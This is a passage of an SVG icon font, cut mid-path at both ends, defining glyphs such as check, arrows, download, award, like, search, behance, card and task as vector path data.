d="M0 -52.4473c0 5.55664 4.50391 10.0605 10.0596 10.0605c5.55664 0 10.0605 -4.50391 10.0605 -10.0605c0 -5.55566 -4.50391 -10.0596 -10.0605 -10.0596c-5.55566 0 -10.0596 4.50391 -10.0596 10.0596zM256.966 202.691c0 5.54492 4.49512 10.04 10.04 10.04
s10.04 -4.49512 10.04 -10.04s-4.49512 -10.04 -10.04 -10.04s-10.04 4.49512 -10.04 10.04zM398.479 329.968c16.6611 -16.6611 16.6611 -43.7715 0 -60.4336c-8.33008 -8.32812 -19.2744 -12.4941 -30.2158 -12.4941c-10.9443 0 -21.8838 4.16406 -30.2158 12.4941
c-16.6611 16.6611 -16.6611 43.7715 0 60.4336c8.07031 8.07031 18.8018 12.5156 30.2158 12.5156s22.1455 -4.44336 30.2158 -12.5156zM384.283 283.733c8.83203 8.83203 8.83203 23.2041 -0.000976562 32.0371c-4.2793 4.2793 -9.96777 6.63477 -16.0186 6.63477
s-11.7393 -2.35547 -16.0176 -6.63477c-8.83301 -8.83301 -8.83301 -23.2051 0 -32.0371c8.83105 -8.83203 23.2041 -8.83203 32.0371 0zM125.409 36.5488c4.96289 -2.47168 6.9834 -8.49805 4.51074 -13.4619l-11.958 -24.0137
c-8.36133 -16.7939 -25.1816 -28.0215 -43.8975 -29.3018l-13.9082 -0.952148c-0.59375 -0.0410156 -1.18945 -0.0615234 -1.78027 -0.0615234c-6.87988 0 -13.5049 2.72656 -18.4033 7.62402c-5.31934 5.32031 -8.0752 12.6758 -7.56152 20.1836l0.952148 13.9062
c1.28223 18.7168 12.5098 35.5361 29.3018 43.8984l24.0137 11.958c4.96484 2.47168 10.9912 0.451172 13.4629 -4.51172s0.451172 -10.9902 -4.5127 -13.4619l-24.0137 -11.958c-10.4404 -5.2002 -17.4219 -15.6592 -18.2188 -27.2959l-0.952148 -13.9072
c-0.160156 -2.34961 1.01367 -3.89844 1.72852 -4.61328s2.26172 -1.88574 4.6123 -1.72852l13.9082 0.951172c11.6377 0.795898 22.0957 7.77832 27.2959 18.2197l11.958 24.0146c2.47168 4.96289 8.49805 6.98438 13.4619 4.51172zM505.071 439.82
c4.70898 -4.64258 7.22461 -11.0908 6.89844 -17.6943l-0.238281 -4.88574c-4.31641 -88.1582 -46.7832 -169.753 -116.513 -223.862l-23.2666 -18.0557v-54.9951c0 -45.6689 -17.7832 -88.6025 -50.0762 -120.896l-58.9795 -58.9785
c-1.91797 -1.91895 -4.48633 -2.94238 -7.10059 -2.94238c-1.20996 0 -2.42871 0.220703 -3.60059 0.669922c-3.70215 1.4248 -6.21875 4.89453 -6.42285 8.85645l-6.44238 125.37l-6.84277 -5.30957c-1.79785 -1.39648 -3.96973 -2.1084 -6.15625 -2.1084
c-1.64258 0 -3.29199 0.40332 -4.7959 1.2207c-2.97266 1.61719 -5.90137 3.30566 -8.79492 5.0459c-4.84668 -3.98926 -10.0332 -8.31641 -15.1016 -12.5469c-7.1123 -5.93359 -14.4648 -12.0703 -20.8438 -17.2451c-1.82324 -1.47852 -4.06543 -2.24316 -6.32617 -2.24316
c-1.45801 0 -2.92578 0.317383 -4.29297 0.96582c-13.998 6.625 -26.5312 15.4629 -37.25 26.2705c-10.4639 10.5498 -19.0469 22.8281 -25.5137 36.4932c-1.67871 3.55176 -1.13379 7.75781 1.39746 10.7627l29.6055 35.1475
c-2.1377 3.48242 -4.1875 7.02148 -6.14355 10.6172c-1.94531 3.57422 -1.53906 7.96777 1.02539 11.127l5.09082 6.2666l-124.845 6.41406c-3.96191 0.202148 -7.43164 2.7207 -8.85645 6.42285c-1.42383 3.70215 -0.532227 7.89746 2.27246 10.7021l58.9785 58.9795
c32.293 32.292 75.2275 50.0762 120.896 50.0762c0.0976562 0 0.196289 -0.000976562 0.293945 -0.00390625l57.584 -1.69141l22.0039 27.0889c52.9531 65.1943 131.396 105.653 215.215 111.005l9.34863 0.595703c6.5918 0.428711 13.082 -1.99805 17.793 -6.63867z
M33.123 202.178l116.94 -6.00781l74.71 91.9795l-42.085 1.23633c-40.25 -0.0390625 -78.0879 -15.7314 -106.554 -44.1963zM184.774 74.125c3.49023 2.91211 7.03711 5.87207 10.499 8.74609c-9.80469 7.17676 -19.0479 15.1133 -27.6406 23.7617
c-0.00390625 0.00292969 -0.00683594 0.00488281 -0.00976562 0.0078125c-0.00195312 0.00195312 -0.00390625 0.00488281 -0.00585938 0.00683594c-0.00585938 0.00585938 -0.0117188 0.0107422 -0.0175781 0.0166016c-7.75 7.80371 -14.9238 16.1318 -21.4785 24.9258
l-21.6758 -25.7334c5.06836 -9.33789 11.3525 -17.8154 18.7373 -25.2598c7.62402 -7.68848 16.3477 -14.2051 25.9922 -19.4287c4.98535 4.10156 10.3584 8.58496 15.5996 12.957zM351.876 120.327h-0.000976562v39.4121l-93.21 -72.3301l6.00293 -116.792l43.0117 43.0117
c28.501 28.501 44.1963 66.3936 44.1963 106.698zM491.679 418.221l0.240234 4.88477c0.0595703 1.23145 -0.5625 2.03809 -0.94043 2.40918c-0.37793 0.37207 -1.19727 0.980469 -2.42285 0.904297l-9.34766 -0.595703
c-78.2471 -4.99414 -151.476 -42.7646 -200.907 -103.623l-129.106 -158.95c7.35254 -12.5625 15.9893 -24.3086 25.7402 -35.1035l53.0361 53.0361c3.9209 3.9209 10.2773 3.9209 14.1992 0c3.91992 -3.9209 3.91992 -10.2793 0 -14.1992l-53.0869 -53.0859
c11.1396 -10.207 23.3105 -19.2158 36.3682 -26.8457l157.461 122.188c65.0938 50.5137 104.738 126.684 108.767 208.98z" />
    <glyph glyph-name="009-check" unicode="&#xf108;" 
d="M196.437 56.8389c-4.89648 -4.9248 -11.5781 -7.67383 -18.5176 -7.67383c-6.94043 0 -13.6221 2.74902 -18.5186 7.67383l-147.89 147.914c-15.3477 15.3477 -15.3477 40.2354 0 55.5537l18.5176 18.5234c15.3525 15.3477 40.2119 15.3477 55.5596 0l92.3311 -92.3359
l249.491 249.496c15.3525 15.3477 40.2354 15.3477 55.5586 0l18.5176 -18.5225c15.3486 -15.3477 15.3486 -40.2305 0 -55.5537zM196.437 56.8389z" />
    <glyph glyph-name="022-arrows" unicode="&#xf113;" 
d="M384 384c35.2881 0 64 -28.7119 64 -64v-256c0 -35.2881 -28.7119 -64 -64 -64h-256c-35.2881 0 -64 28.7119 -64 64v64c0 8.83203 7.16797 16 16 16s16 -7.16797 16 -16v-64c0 -17.6484 14.3516 -32 32 -32h256c17.6484 0 32 14.3516 32 32v256
c0 17.6484 -14.3516 32 -32 32h-256c-17.6484 0 -32 -14.3516 -32 -32v-64c0 -8.83203 -7.16797 -16 -16 -16s-16 7.16797 -16 16v64c0 35.2881 28.7119 64 64 64h256zM220.832 116.552c-6.32812 6.16797 -6.46387 16.2959 -0.288086 22.6318l51.3125 52.6885
l-51.3125 52.9844c-6.16797 6.32715 -6.03223 16.4551 0.295898 22.624c6.32812 6.17578 16.4639 6.03125 22.624 -0.296875l51.3125 -52.6875c5.8877 -5.8877 9.22363 -13.9277 9.22363 -22.4805c0 -8.54395 -3.32812 -16.5752 -9.36816 -22.6318l-51.168 -52.5361
c-3.13574 -3.21582 -7.2959 -4.83203 -11.4639 -4.83203c-4.03223 0 -8.05566 1.50391 -11.168 4.53613z" />
    <glyph glyph-name="001-download" unicode="&#xf100;" 
d="M503.816 317.933c5.27832 -5.2666 8.18359 -12.4014 8.18359 -19.9062c-0.00878906 -7.50098 -2.90527 -14.7354 -8.18359 -20.0059l-227.834 -228.245c-5.26953 -5.26562 -12.292 -8.9834 -19.7969 -8.9834h-0.0878906c-7.56738 0 -14.5898 3.71289 -19.8594 8.9834
l-228.046 228.865c-10.9229 10.915 -10.9229 28.6934 0 39.6084l16.7754 16.7832c5.27344 5.27441 12.3086 8.17578 19.8096 8.17578s14.5322 -2.90137 19.8018 -8.17578l191.535 -191.535l191.314 191.323c5.27832 5.27344 12.3096 8.17969 19.8105 8.17969
c7.50488 0 14.5273 -2.90625 19.8057 -8.17969z" />
    <glyph glyph-name="032-award" unicode="&#xf11c;" 
d="M467 448c24.8125 0 45 -20.1875 45 -45v-22.8555c0 -37.0195 -12.7344 -73.3281 -35.8633 -102.234c-19.75 -24.6875 -46.0469 -43.0234 -76.043 -53.0234c-0.0625 -0.0195312 -0.128906 -0.0429688 -0.191406 -0.0625l-16.7656 -5.33594
c-18.4688 -30.0391 -47.4023 -53.1719 -82.1367 -64.168v-23.3203c0 -8.26953 6.73047 -15 15 -15c24.8125 0 45 -20.1875 45 -45v-15h15c8.28516 0 15 -6.71484 15 -15v-76h15c8.28516 0 15 -6.71484 15 -15s-6.71484 -15 -15 -15h-300c-8.28516 0 -15 6.71484 -15 15
s6.71484 15 15 15h15v76c0 8.28516 6.71484 15 15 15h15v15c0 24.8125 20.1875 45 45 45c8.26953 0 15 6.73047 15 15v23.3203c-34.7734 11.0078 -63.7344 34.1836 -82.1992 64.2695l-15.8984 5.29688c-30.4453 10.1484 -57.8047 28.9805 -77.0391 53.0234
c-23.1289 28.9062 -35.8633 65.2148 -35.8633 102.234v22.8555c0 24.8125 20.1875 45 45 45h422zM59.2891 296.652c13.5547 -16.9414 32.1602 -30.7266 53.1367 -39.543c-2.13281 7.61719 -3.69141 15.4648 -4.58594 23.5l-15.2656 137.391h-47.5742
c-8.26953 0 -15 -6.73047 -15 -15v-22.8555c0 -30.2344 10.4023 -59.8828 29.2891 -83.4922zM151 -34h210v61h-210v-61zM282.637 181.383c49.3008 11.3438 86.1523 52.5508 91.707 102.539l14.8984 134.078h-266.484l14.8984 -134.078
c5.55469 -49.9883 42.4062 -91.1953 91.707 -102.539c6.8125 -1.56641 11.6367 -7.62891 11.6367 -14.6172v-34.7656c0 -24.8125 -20.1875 -45 -45 -45c-8.26953 0 -15 -6.73047 -15 -15v-15h150v15c0 8.26953 -6.73047 15 -15 15c-24.8125 0 -45 20.1875 -45 45v34.7656
c0 6.98828 4.82422 13.0508 11.6367 14.6172zM482 380.145v22.8555c0 8.26953 -6.73047 15 -15 15h-47.5742l-15.2656 -137.391c-0.914062 -8.19922 -2.51562 -16.1992 -4.71875 -23.9648c20.8281 8.60938 39.1094 22.3047 53.2695 40.0078
c18.8867 23.6094 29.2891 53.2578 29.2891 83.4922zM482 380.145zM318.105 345.289c5.69531 -0.808594 10.4258 -4.80078 12.1797 -10.2773s0.222656 -11.4727 -3.94531 -15.4375l-24.1758 -23.0117l5.69141 -32.3945c0.984375 -5.60938 -1.28906 -11.2891 -5.875 -14.6719
c-4.58203 -3.37891 -10.6836 -3.87109 -15.75 -1.26953l-30.2305 15.5195l-30.2344 -15.5195c-5.05469 -2.59375 -11.1562 -2.11328 -15.75 1.26953c-4.58203 3.37891 -6.85547 9.0625 -5.87109 14.6719l5.69141 32.3945l-24.1797 23.0117
c-4.16406 3.96094 -5.69531 9.96094 -3.94141 15.4375s6.48438 9.46875 12.1758 10.2773l33.7109 4.78125l15.0117 29.6953c2.55078 5.05078 7.73047 8.23438 13.3867 8.23438s10.8359 -3.18359 13.3867 -8.23438l15.0117 -29.6953zM275.66 312.754l7.55078 7.1875
l-10.7773 1.52734c-4.85547 0.6875 -9.06641 3.70703 -11.2812 8.08594l-5.15234 10.1953l-5.15625 -10.1992c-2.21094 -4.375 -6.42188 -7.39453 -11.2773 -8.08203l-10.7773 -1.53125l7.55078 -7.18359c3.63672 -3.46484 5.30078 -8.51562 4.43359 -13.4648
l-1.86328 -10.5938l10.2383 5.25391c4.30078 2.20703 9.40234 2.20703 13.6992 0l10.2383 -5.25391l-1.85938 10.5938c-0.871094 4.94922 0.792969 10 4.43359 13.4648zM275.66 312.754z" />
    <glyph glyph-name="058-like" unicode="&#xf134;" 
d="M474.644 373.73c24.0898 -27.3359 37.3564 -63.9434 37.3564 -103.081c0 -42.6035 -16.6328 -82.2275 -52.3447 -124.7c-31.917 -37.9609 -77.834 -77.0889 -131.002 -122.396c-19.8164 -16.8867 -40.3057 -34.3457 -62.1182 -53.4307l-0.655273 -0.574219
c-2.82812 -2.47461 -6.35352 -3.71289 -9.87988 -3.71289s-7.05176 1.2373 -9.87988 3.71289l-0.655273 0.574219c-21.8125 19.085 -42.3018 36.5449 -62.1152 53.4287c-53.1709 45.3096 -99.0879 84.4375 -131.005 122.397
c-35.7119 42.4717 -52.3447 82.0967 -52.3447 124.7c0 39.1377 13.2666 75.7451 37.3555 103.079c25.2539 28.6543 60.2861 44.4355 98.6445 44.4355c53.9482 0 88.1025 -32.2197 107.255 -59.25c4.96973 -7.01367 9.19629 -14.0469 12.7451 -20.665
c3.54883 6.61816 7.77637 13.6514 12.7451 20.665c19.1523 27.0303 53.3066 59.25 107.255 59.25c38.3584 0 73.3906 -15.7803 98.6436 -44.4336zM309.193 46.3857c104.062 88.6748 172.807 147.256 172.807 224.264c0 31.8291 -10.6055 61.3936 -29.8633 83.2441
c-19.4766 22.0996 -46.5156 34.2705 -76.1367 34.2705c-41.1289 0 -67.7158 -25.3379 -82.7764 -46.5928c-13.5088 -19.0654 -20.5576 -38.2832 -22.9619 -45.6602c-2.01074 -6.1748 -7.76758 -10.3545 -14.2617 -10.3545s-12.251 4.17969 -14.2617 10.3545
c-2.4043 7.37695 -9.45312 26.5947 -22.9619 45.6592c-15.0605 21.2559 -41.6475 46.5938 -82.7764 46.5938c-29.6211 0 -56.6602 -12.1709 -76.1377 -34.2705c-19.2568 -21.8506 -29.8623 -51.415 -29.8623 -83.2441c0 -77.0078 68.7451 -135.589 172.804 -224.262
c17.083 -14.5566 34.6621 -29.5371 53.1963 -45.6475c18.5352 16.1123 36.1133 31.0918 53.1934 45.6455z" />
    <glyph glyph-name="015-search-1" unicode="&#xf10e;" 
d="M225.474 448c124.33 0 225.475 -101.151 225.475 -225.474c0 -124.33 -101.145 -225.475 -225.475 -225.475c-124.322 0 -225.474 101.145 -225.474 225.475c0 124.322 101.151 225.474 225.474 225.474zM225.474 38.6768c101.373 0 183.849 82.4766 183.849 183.85
s-82.4756 183.848 -183.849 183.848s-183.848 -82.4756 -183.848 -183.849s82.4746 -183.849 183.848 -183.849zM505.902 -28.4717c8.13086 -8.12402 8.13086 -21.3066 0 -29.4307c-4.06641 -4.06445 -9.39453 -6.09766 -14.7158 -6.09766
c-5.32715 0 -10.6494 2.0332 -14.7148 6.09766l-119.328 119.328c-8.13086 8.12402 -8.13086 21.3066 0 29.4307c8.13184 8.13086 21.2998 8.13086 29.4307 0z" />
    <glyph glyph-name="079-left-arrow-2" unicode="&#xf144;" 
d="M167.009 366.568c7.21777 7.21777 18.582 7.21777 25.7998 0c6.97461 -6.97461 6.97461 -18.582 0 -25.54l-130.82 -130.82h431.69c10.0625 0 18.3213 -7.99902 18.3213 -18.0615c0 -10.0635 -8.25879 -18.3223 -18.3213 -18.3223h-431.69l130.82 -130.576
c6.97461 -7.21875 6.97461 -18.8418 0 -25.7998c-7.21777 -7.21875 -18.582 -7.21875 -25.7998 0l-161.79 161.79c-6.97461 6.97461 -6.97461 18.582 0 25.54z" />
    <glyph glyph-name="088-behance" unicode="&#xf14d;" 
d="M210.642 207.361c16.1289 -5.82422 28.29 -15.0098 36.5791 -27.5547c8.19238 -12.5449 12.3203 -27.8096 12.3203 -45.7314c0 -18.4971 -4.7041 -35.1064 -14.1133 -49.7637c-5.95215 -9.69727 -13.4404 -17.9219 -22.4014 -24.5459
c-10.0811 -7.61719 -21.9863 -12.834 -35.7471 -15.6816c-13.7607 -2.81641 -28.6426 -4.19238 -44.708 -4.19238h-142.571v312.121h152.908c38.5957 -0.575195 65.8936 -11.6484 82.0234 -33.2822c9.66406 -13.2812 14.4971 -29.1221 14.4971 -47.6523
c0 -19.041 -4.83301 -34.4023 -14.625 -45.9873c-5.50488 -6.43262 -13.5371 -12.3848 -24.1621 -17.7295zM63.0771 297.801v-68.8701h76.9346c13.6973 0 24.8662 2.59277 33.4746 7.74512c8.54492 5.15234 12.8652 14.3047 12.8652 27.3945
c0 14.5928 -5.66504 24.1611 -16.9941 28.8662c-9.79199 3.23242 -22.2734 4.86426 -37.4102 4.86426h-68.8701zM171.982 99.5439c13.8887 6.84863 20.8018 19.7783 20.8018 38.9795c0 16.2891 -6.68848 27.4268 -20.1299 33.5068
c-7.55273 3.36035 -18.1133 5.15234 -31.6826 5.24805h-77.8945v-83.2383h76.8379c13.7295 0 24.4502 1.82422 32.0674 5.50391zM327.195 298.601v38.8516h135.595v-38.8516h-135.595zM509.897 184.127c1.66406 -10.5605 2.30469 -25.8896 2.04883 -45.8271h-170.479
c1.02441 -23.1377 9.08887 -39.3955 24.5146 -48.6758c9.34473 -5.79297 20.5449 -8.70508 33.7627 -8.70508c13.8887 0 25.2178 3.52051 33.9229 10.5605c4.7998 3.84082 8.99219 9.12109 12.6084 15.874h62.4697c-1.66406 -13.666 -9.24902 -27.5869 -22.6582 -41.7314
c-20.9619 -22.4023 -50.3086 -33.6348 -88.0391 -33.6348c-31.1709 0 -58.6289 9.44043 -82.4072 28.3857c-23.874 18.9141 -35.7471 49.7324 -35.7471 92.3916c0 40.0029 10.7529 70.6943 32.2275 92.04c21.5371 21.2812 49.3799 32.002 83.6543 32.002
c20.418 0.0322266 38.7549 -3.58398 55.0449 -10.8164c16.3535 -7.20117 29.7939 -18.5938 40.3867 -34.1465c9.66504 -13.7295 15.874 -29.6348 18.6895 -47.7168zM343.004 178.143h105.449c-1.12012 16.0332 -6.59277 28.1621 -16.29 36.5156
c-9.82422 8.28809 -21.8896 12.417 -36.3223 12.417c-15.6494 -0.0322266 -27.875 -4.44824 -36.5156 -13.2178c-8.64062 -8.80078 -14.0811 -20.7051 -16.3213 -35.7148z" />
    <glyph glyph-name="028-card" unicode="&#xf119;" 
d="M479.649 199.495c17.8379 0 32.3506 -14.5117 32.3516 -32.3496v-198.796c0 -17.8379 -14.5127 -32.3496 -32.3506 -32.3496h-74.6143c-4.14258 0 -7.5 3.3584 -7.5 7.5s3.35742 7.5 7.5 7.5h74.6143c9.56836 0 17.3506 7.78223 17.3506 17.3496v198.796
c0 9.56641 -7.7832 17.3496 -17.3506 17.3496h-100.385c-0.0078125 0 -0.015625 -0.000976562 -0.0234375 -0.000976562s-0.0146484 0.000976562 -0.0224609 0.000976562h-230.896c-9.56738 0 -17.3496 -7.7832 -17.3496 -17.3496v-112.821
c-0.000976562 -0.0849609 0.00390625 -0.167969 0 -0.25293v-85.7217c0 -9.56738 7.78223 -17.3496 17.3496 -17.3496h226.709c4.14355 0 7.5 -3.3584 7.5 -7.5s-3.35645 -7.5 -7.5 -7.5h-226.71c-17.8379 0 -32.3496 14.5117 -32.3496 32.3496v81.2305
c-5.05469 2.82812 -9.29785 6.98145 -12.2275 12.0557l-74.5488 129.122l-12.4248 21.5205c-0.000976562 0.000976562 -0.000976562 0.00292969 -0.00195312 0.00390625l-12.4229 21.5166c-4.32031 7.4834 -5.46777 16.2012 -3.23145 24.5469
c2.23633 8.34668 7.58984 15.3223 15.0723 19.6426l105.904 61.1436c3.58691 2.07227 8.17383 0.841797 10.2451 -2.74512c2.07031 -3.58691 0.841797 -8.17383 -2.74512 -10.2441l-105.903 -61.1426c-4.01367 -2.31836 -6.88379 -6.05957 -8.08398 -10.5352
c-1.2002 -4.47656 -0.583984 -9.15332 1.7334 -13.166l8.6748 -15.0254l316.987 183.013l-8.6748 15.0244c-4.7832 8.28613 -15.416 11.1328 -23.7002 6.35059l-154.137 -88.9912c-3.58691 -2.07227 -8.17383 -0.841797 -10.2451 2.74512s-0.841797 8.17383 2.74512 10.2451
l154.137 88.9912c7.4834 4.31934 16.1992 5.46973 24.5479 3.23145c8.34668 -2.23633 15.3232 -7.58984 19.6436 -15.0723l12.4238 -21.5195l1.92188 -3.3291l85.0498 -147.314c8.91895 -15.4473 3.60742 -35.2715 -11.8408 -44.1895l-27.6484 -15.9629h72.4258z
M350.501 396.296l-316.987 -183.014l9.06641 -15.7031l316.987 183.014l-6.42969 11.1357zM115.975 167.146c0 17.8379 14.5117 32.3496 32.3496 32.3496h228.9l50.1484 28.9531c8.28418 4.78418 11.1338 15.416 6.35059 23.7002l-66.6572 115.454l-316.987 -183.014
l65.8955 -114.134v96.6904zM389.029 293.296c2.07129 -3.58691 0.841797 -8.17383 -2.74512 -10.2451l-71.7344 -41.416c-1.17969 -0.681641 -2.4707 -1.00586 -3.74316 -1.00586c-2.5918 0 -5.1123 1.34473 -6.50195 3.75098
c-2.07031 3.58691 -0.841797 8.17383 2.74512 10.2451l71.7344 41.416c3.58496 2.07129 8.1748 0.841797 10.2451 -2.74512zM402.851 254.357l-28.6943 -16.5664c-1.17969 -0.681641 -2.4707 -1.00586 -3.74219 -1.00586c-2.5918 0 -5.1123 1.34473 -6.50195 3.75098
c-2.07129 3.58691 -0.841797 8.17383 2.74512 10.2451l28.6934 16.5664c3.58496 2.07129 8.17383 0.841797 10.2441 -2.74512c2.07129 -3.58691 0.842773 -8.17383 -2.74414 -10.2451zM363.402 101.664c-8.54688 0 -15.5 6.95215 -15.5 15.499v17.1328
c0 8.54688 6.95312 15.5 15.5 15.5h83.3975c8.54688 0 15.5 -6.95312 15.5 -15.5v-17.1328c0 -8.54688 -6.95312 -15.499 -15.5 -15.499h-83.3975zM362.902 134.296v-17.1328c0 -0.275391 0.224609 -0.5 0.5 -0.5h83.3975c0.275391 0 0.5 0.224609 0.5 0.5v17.1328
c0 0.276367 -0.224609 0.5 -0.5 0.5h-83.3975c-0.275391 0 -0.5 -0.223633 -0.5 -0.5zM246.938 100.597c0 -8.54688 -6.95312 -15.5 -15.5 -15.5h-66.832c-8.54688 0 -15.499 6.95312 -15.499 15.5v50.2666c0 8.5459 6.95215 15.499 15.499 15.499h66.832
c8.54688 0 15.5 -6.95312 15.5 -15.499v-50.2666zM231.938 150.863c0 0.275391 -0.223633 0.5 -0.5 0.5h-25.916v-18.1328h26.416v17.6328zM164.606 151.363c-0.275391 0 -0.5 -0.224609 -0.5 -0.5v-17.6328h26.417v18.1328h-25.917zM164.106 100.597
c0 -0.276367 0.224609 -0.5 0.5 -0.5h66.832c0.276367 0 0.5 0.223633 0.5 0.5v17.6328h-67.832v-17.6328zM156.607 17.2656h33.1318c4.1416 0 7.5 -3.3584 7.5 -7.5s-3.3584 -7.5 -7.5 -7.5h-33.1318c-4.14258 0 -7.5 3.3584 -7.5 7.5s3.35742 7.5 7.5 7.5z
M222.872 2.26562c-4.14258 0 -7.5 3.3584 -7.5 7.5s3.35742 7.5 7.5 7.5h99.3975c4.14355 0 7.5 -3.3584 7.5 -7.5s-3.35645 -7.5 -7.5 -7.5h-99.3975zM355.402 2.26562c-4.14258 0 -7.5 3.3584 -7.5 7.5s3.35645 7.5 7.5 7.5h49.6992
c4.14258 0 7.49902 -3.3584 7.49902 -7.5s-3.35645 -7.5 -7.49902 -7.5h-49.6992z" />
    <glyph glyph-name="017-task" unicode="&#xf110;" 
d="M502.682 338.496c5.83496 -3.63281 9.31836 -9.90527 9.31836 -16.7803c0.000976562 -6.875 -3.4834 -13.1494 -9.31836 -16.7822l-44.8008 -27.8809c-0.300781 -0.1875 -0.612305 -0.350586 -0.93457 -0.493164
c-0.109375 -0.0478516 -0.222656 -0.078125 -0.333984 -0.121094c-0.212891 -0.0820312 -0.423828 -0.168945 -0.643555 -0.230469c-0.231445 -0.0664062 -0.467773 -0.106445 -0.703125 -0.149414c-0.103516 -0.0185547 -0.204102 -0.0498047 -0.30957 -0.0644531
c-0.345703 -0.0488281 -0.693359 -0.0732422 -1.04199 -0.0732422c-0.00585938 0 -0.0107422 0.000976562 -0.015625 0.000976562h-32.8271v-38.9639c0 -4.14258 -3.3584 -7.5 -7.5 -7.5s-7.5 3.35742 -7.5 7.5v46.3857
c0 0.0263672 -0.00390625 0.0507812 -0.00390625 0.0771484c0 0.0253906 0.00390625 0.0507812 0.00390625 0.0771484v76.4443c0 0.0263672 -0.00390625 0.0507812 -0.00390625 0.0771484c0 0.0253906 0.00390625 0.0507812 0.00390625 0.0771484v0.543945
c0 11.7803 -9.58398 21.3643 -21.3652 21.3643h-13.2578v-14.624c0 -4.1416 -3.35742 -7.5 -7.5 -7.5c-4.1416 0 -7.5 3.3584 -7.5 7.5v14.624h-61.0859v-14.624c0 -4.1416 -3.3584 -7.5 -7.5 -7.5c-4.14258 0 -7.5 3.3584 -7.5 7.5v14.624h-61.0869v-14.624
c0 -4.1416 -3.3584 -7.5 -7.5 -7.5c-4.14258 0 -7.5 3.3584 -7.5 7.5v14.624h-61.0869v-14.624c0 -4.1416 -3.3584 -7.5 -7.5 -7.5s-7.5 3.3584 -7.5 7.5v14.624h-34.625v-298.775c0 -4.1416 -3.35742 -7.5 -7.5 -7.5c-4.1416 0 -7.5 3.3584 -7.5 7.5v192.691h-17.4336
c-0.00585938 0 -0.0117188 -0.000976562 -0.0195312 -0.000976562h-41.0381c-3.45898 0 -6.71777 0.879883 -9.56152 2.42676c-0.112305 0.0605469 -0.216797 0.135742 -0.328125 0.199219c-0.449219 0.256836 -0.897461 0.517578 -1.3252 0.806641
c-5.34082 3.61035 -8.85742 9.7207 -8.85742 16.6377v0v0v15.9678c0 4.1416 3.3584 7.49902 7.5 7.49902s7.5 -3.35742 7.5 -7.49902v-15.9678c0 -1.74805 0.888672 -3.29199 2.23926 -4.2041c0.254883 -0.172852 0.52832 -0.318359 0.813477 -0.442383
c0.0166016 -0.00683594 0.0302734 -0.0185547 0.0458984 -0.0253906c0.606445 -0.256836 1.27246 -0.398438 1.97168 -0.398438h21.6162c-0.423828 1.62109 -0.648438 3.31934 -0.648438 5.07031v51.4531c0 1.75098 0.225586 3.45117 0.648438 5.07227h-21.6143
c-1.99023 0 -3.69922 -1.16309 -4.5293 -2.83496c-0.335938 -0.678711 -0.542969 -1.43359 -0.542969 -2.24121v-5.48242c0 -4.1416 -3.3584 -7.5 -7.5 -7.5s-7.5 3.3584 -7.5 7.5v5.48633c0 3.07617 0.71582 5.98242 1.95898 8.58984
c3.22656 6.77832 10.1211 11.4863 18.1113 11.4863h58.4932v21.9854c0 4.14258 3.3584 7.5 7.5 7.5h42.125v14.624c0 4.14258 3.3584 7.5 7.5 7.5s7.5 -3.35742 7.5 -7.5v-14.624h61.0869v14.624c0 4.14258 3.35742 7.5 7.5 7.5c4.1416 0 7.5 -3.35742 7.5 -7.5v-14.624
h61.0869v14.624c0 4.14258 3.35742 7.5 7.5 7.5c4.1416 0 7.5 -3.35742 7.5 -7.5v-14.624h61.0859v14.624c0 4.14258 3.3584 7.5 7.5 7.5c4.14258 0 7.5 -3.35742 7.5 -7.5v-14.625h13.2607c17.6992 0 32.4785 -12.7129 35.7031 -29.4854h33.5068
c0.0410156 0 0.0820312 -0.0078125 0.123047 -0.00878906c0.125977 -0.00292969 0.25 -0.0175781 0.375977 -0.0263672c0.213867 -0.0146484 0.427734 -0.0263672 0.638672 -0.0576172c0.0908203 -0.0146484 0.178711 -0.0400391 0.269531 -0.0576172
c0.242188 -0.0458984 0.484375 -0.0927734 0.720703 -0.163086c0.0126953 -0.00292969 0.0244141 -0.00878906 0.0371094 -0.0126953c0.628906 -0.19043 1.23535 -0.456055 1.79785 -0.805664zM61.1006 290.92h17.4619v61.5996h-17.376
c-0.0253906 0 -0.0507812 -0.00390625 -0.0771484 -0.00390625c-2.79688 0 -5.07129 -2.27539 -5.07129 -5.07227v-51.4531c0 -2.79297 2.27051 -5.06543 5.0625 -5.07031zM496.998 321.717c0 0.795898 -0.21875 2.78223 -2.24707 4.0459l-33.3359 20.75v-49.5918
l33.3359 20.75v0c2.02832 1.2627 2.24707 3.25 2.24707 4.0459zM421.072 352.52v-61.5996h25.3428v61.5996h-25.3428zM413.572 214.456c4.14258 0 7.5 -3.3584 7.50098 -7.5v-151.686c0 -0.0820312 -0.00878906 -0.163086 -0.0117188 -0.245117
c-0.00292969 -0.0898438 -0.00683594 -0.177734 -0.0126953 -0.266602c-0.0224609 -0.310547 -0.0566406 -0.618164 -0.115234 -0.920898c-0.00195312 -0.0126953 -0.00292969 -0.0244141 -0.00488281 -0.0361328
c-0.0634766 -0.31543 -0.15332 -0.62207 -0.254883 -0.923828c-0.0273438 -0.0810547 -0.0566406 -0.161133 -0.0869141 -0.241211c-0.106445 -0.28418 -0.225586 -0.5625 -0.365234 -0.831055c-0.0107422 -0.0205078 -0.0185547 -0.0400391 -0.0283203 -0.0605469
c-0.151367 -0.28418 -0.327148 -0.554688 -0.514648 -0.818359c-0.0498047 -0.0703125 -0.100586 -0.138672 -0.152344 -0.206055c-0.198242 -0.258789 -0.407227 -0.509766 -0.638672 -0.743164c-0.00292969 -0.00390625 -0.00585938 -0.0078125 -0.00976562 -0.0107422
l-82.8984 -82.8975c-0.176758 -0.177734 -0.361328 -0.344727 -0.553711 -0.500977c-0.0966797 -0.0800781 -0.201172 -0.149414 -0.300781 -0.223633c-0.0986328 -0.0732422 -0.193359 -0.149414 -0.293945 -0.216797
c-0.118164 -0.0791016 -0.242188 -0.146484 -0.364258 -0.217773c-0.0898438 -0.0527344 -0.175781 -0.110352 -0.268555 -0.15918c-0.121094 -0.0654297 -0.249023 -0.119141 -0.374023 -0.176758c-0.0976562 -0.0449219 -0.191406 -0.0957031 -0.290039 -0.136719
c-0.117188 -0.0478516 -0.238281 -0.0859375 -0.357422 -0.12793c-0.111328 -0.0390625 -0.220703 -0.0839844 -0.333984 -0.118164c-0.115234 -0.0341797 -0.233398 -0.0585938 -0.349609 -0.0878906c-0.120117 -0.0292969 -0.239258 -0.0644531 -0.360352 -0.0888672
